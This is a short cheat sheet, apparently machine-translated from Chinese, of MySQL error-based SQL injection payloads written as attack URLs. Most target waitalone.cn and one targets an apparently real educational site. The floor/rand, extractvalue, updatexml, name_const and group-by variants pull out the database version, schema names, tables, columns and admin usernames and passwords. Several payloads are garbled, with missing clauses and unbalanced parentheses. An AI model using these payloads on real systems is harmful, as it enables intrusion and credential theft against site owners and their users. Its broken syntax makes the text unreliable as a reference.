1, through floor critical error
/* Database version */
Http://www.waitalone.cn/sql.php?id=1+and (select 1 from (SELECT COUNT (*), concat (SELECT (select Concat (0x7e, Version (), 0x7e)) (Information_schema.tables limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by x) a)
/* Simple Way Bauku */
Http://www.waitalone.cn/sql.php?id=info ()
/* Connect users */
Http://www.waitalone.cn/sql.php?id=1+and (select 1 from (SELECT COUNT (*), concat (SELECT (select Concat (0x7e, User (), 0x7e)) from Information_schema.tables limit 0,1), floor (rand (0) *) x from Information_schema.tables Group by X) a )
/* Connect to Database */
Http://www.waitalone.cn/sql.php?id=1+and (select 1 from (SELECT COUNT (*), concat (SELECT (select Concat (0x7e, Database (), 0x7e)) (Information_schema.tables limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X) a)
/* Bauku */
Http://www.waitalone.cn/sql.php?id=1+and (select 1 from (SELECT COUNT (*), concat (select (SELECT DISTINCT concat (0x7e,schema_name,0x7e) From Information_schema.schemata limit 0,1)) by Information_schema.tables limit 0,1), floor (rand (0) *)) x from Information_schema.tables GROUP by X) a)
/* Mob Watch */
Http://www.waitalone.cn/sql.php?id=1+and (select 1 from (SELECT COUNT (*), concat (select (SELECT DISTINCT concat (0x7e,table_name,0x7e) From Information_schema.tables where table_schema=database () limit 0,1)) from Information_schema.tables LIMIT 0,1), Floor (rand (0) *) x from Information_schema.tables Group by X)
/* Storm field */
Http://www.waitalone.cn/sql.php?id=1+and (select 1 from (SELECT COUNT (*), concat (select (SELECT DISTINCT concat (0x7e,column_name,0x7e) From Information_schema.columns where table_name=0x61646d696e limit 0,1)) from Information_schema.tables limit 0,1), Floor (rand (0) *) x from Information_schema.tables Group by X)
/* Mob content */
Http://www.waitalone.cn/sql.php?id=1+and (select 1 from (SELECT COUNT (*), concat (select (SELECT DISTINCT concat (0x23,username,0x3a,password,0x23) From admin limit 0,1) (Information_schema.tables limit 0,1), floor (rand (0) *) x from Information_schema.tables Group by X) a)
2. Extractvalue (with length limit, maximum 32 bits)
Http://www.waitalone.cn/sql.php?id=1+and extractvalue (1, concat (0x7e, (select @ @version), 0x7e))
Http://www.waitalone.cn/sql.php?id=1+and extractvalue (1, concat (0x7e, (SELECT distinct concat (0x23,username,0x3a, password,0x23) (from admin limit 0,1)))
3. Updatexml (with length limit, maximum 32 bits)
Http://www.waitalone.cn/sql.php?id=1+and Updatexml (1,concat (0x7e, (SELECT @ @version), 0x7e), 1)
Http://www.waitalone.cn/sql.php?id=1+and Updatexml (1,concat (0x7e, (SELECT distinct concat (0x23,username,0x3a, password,0x23) from admin limit 0,1), 0x7e), 1)
4, Name_const (for the lower version)
Http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1= (select+*+from+ (select+ Name_const (Version (), 1), Name_const (version (), 1)) +as+x)--
5. Error based Double Query injection (http://www.vaibs.in/error-based-double-query-injection/)
/* Database version */
Http://www.waitalone.cn/sql.php?id=1+or+1+group+by+concat_ws (0x7e,version (), Floor (rand (0) *)) +having+min (0) +or +1
MySQL Burst injection method collation